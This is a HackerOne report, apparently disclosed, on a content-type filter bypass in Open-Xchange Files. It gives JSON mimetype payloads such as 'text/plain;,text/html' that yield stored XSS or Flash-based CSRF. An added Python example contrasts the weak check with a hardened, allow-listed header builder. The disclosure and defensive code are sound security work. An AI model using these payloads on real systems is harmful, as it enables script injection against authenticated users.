Open-Xchange: [XSS/CSRF] filter content-type bypass in Files v2.0

2018-03-05T10:00:09
ID H1:321980
Type hackerone
Reporter secator
Modified 2020-01-24T11:50:27

Description

Hi.

> sandbox.open-xchange.com runs a version that contains a fix for your first report

First report #304098

> If you found a valid workaround, please open a new report, thanks :)

:) Yeah, I tested it now in the sandbox.

Steps:

1. Add a Note with any HTML tags.
2. Change Fileinfo (json):

   {"file":{"file_mimetype":"text/plain;,text/html","filename":"test-txt"}}
   {"file":{"file_mimetype":"text/plain;,image/svg+xml","filename":"test-txt"}}
   ...
   {"file":{"file_mimetype":"text/plain;,application/x-shockwave-flash"}} // for CSRF

3. Open the attachment, response headers: Content-Type: text/plain; ,text/html;charset=UTF-8

This Content-Type is valid for any browser.

Impact

Malicious code injection (HTML) and executing unwanted actions on a web application in which they're currently authenticated (Flash).

The hacker selected the Cross-site Scripting (XSS) - Stored weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:

URL https://sandbox.open-xchange.com

Verified Yes
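The bypass in the report works because a filter that only looks at the part of the stored mimetype before the first ";" sees "text/plain", while the server then echoes the whole value into the response header. The following is an added example, not code from the report or from Open-Xchange: the weak "split on semicolon" check is an assumption that reproduces the observed behaviour (the actual OX check is not on the page), and the function names, the allow-list and the filename handling are hypothetical. It contrasts that weak check with a strict media-type parser that rejects the "text/plain;,text/html" payload outright and falls back to a download-only response.

```python
import re

# Hypothetical allow-list of media types the download endpoint may serve inline.
ALLOWED_INLINE = {"text/plain", "image/png", "image/jpeg"}

# RFC 7230 "token": no whitespace and no separators such as ';' ',' '/' '"'.
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
# Strict media-type grammar: type "/" subtype *( ";" parameter ), nothing else.
_MEDIA_TYPE = re.compile(
    rf'^(?P<type>{_TOKEN})/(?P<subtype>{_TOKEN})'
    rf'(?P<params>(?:\s*;\s*{_TOKEN}=(?:{_TOKEN}|"[^"]*"))*)\s*$'
)
_PARAM = re.compile(rf'({_TOKEN})=({_TOKEN}|"[^"]*")')


def naive_filter_allows(file_mimetype: str) -> bool:
    """Weak check (assumed) of the kind the report defeats: only the text
    before the first ';' is compared with the allow-list."""
    base = file_mimetype.split(";", 1)[0].strip().lower()
    return base in ALLOWED_INLINE


def build_header(file_mimetype: str) -> str:
    """Content-Type value a server emits when it appends its own charset
    parameter to the stored mimetype unchanged (constructed to match the
    header quoted in the report)."""
    return f"{file_mimetype};charset=UTF-8"


def strict_media_type(file_mimetype: str):
    """Parse a media type strictly.

    Returns (lower-cased "type/subtype", {param: value}) or None when the
    string is not a single well-formed media type. "text/plain;,text/html"
    fails because ',' can never start a parameter."""
    m = _MEDIA_TYPE.match(file_mimetype)
    if not m:
        return None
    essence = f"{m['type']}/{m['subtype']}".lower()
    params = {k.lower(): v.strip('"') for k, v in _PARAM.findall(m["params"])}
    return essence, params


def hardened_headers(file_mimetype: str, filename: str) -> dict:
    """Build response headers from a strictly parsed, allow-listed media type.

    Anything unparsable or not allow-listed is served as an opaque download;
    nosniff stops the browser from second-guessing the declared type."""
    # Hypothetical filename sanitising: keep only safe characters so the
    # value cannot break out of the quoted Content-Disposition parameter.
    safe_name = re.sub(r"[^\w.\-]", "_", filename) or "download"
    headers = {"X-Content-Type-Options": "nosniff"}
    parsed = strict_media_type(file_mimetype)
    if parsed is None or parsed[0] not in ALLOWED_INLINE:
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = f'attachment; filename="{safe_name}"'
        return headers
    essence, _ = parsed
    # Re-emit only the parsed essence, never the caller-supplied string.
    headers["Content-Type"] = (
        f"{essence};charset=UTF-8" if essence.startswith("text/") else essence
    )
    headers["Content-Disposition"] = f'inline; filename="{safe_name}"'
    return headers


if __name__ == "__main__":
    # Constructed payloads taken from the report's Fileinfo values.
    for payload in ("text/plain;,text/html", "text/plain;,image/svg+xml",
                    "text/plain;,application/x-shockwave-flash", "text/plain"):
        print(f"{payload!r}: naive allows={naive_filter_allows(payload)}, "
              f"would send Content-Type: {build_header(payload)}, "
              f"hardened sends {hardened_headers(payload, 'test-txt')['Content-Type']}")
```

The key design point is that the hardened path never concatenates the stored string into the header: it parses, allow-lists the parsed essence, and rebuilds the header from that value, so a stored mimetype that contains separators has no way to reach the client.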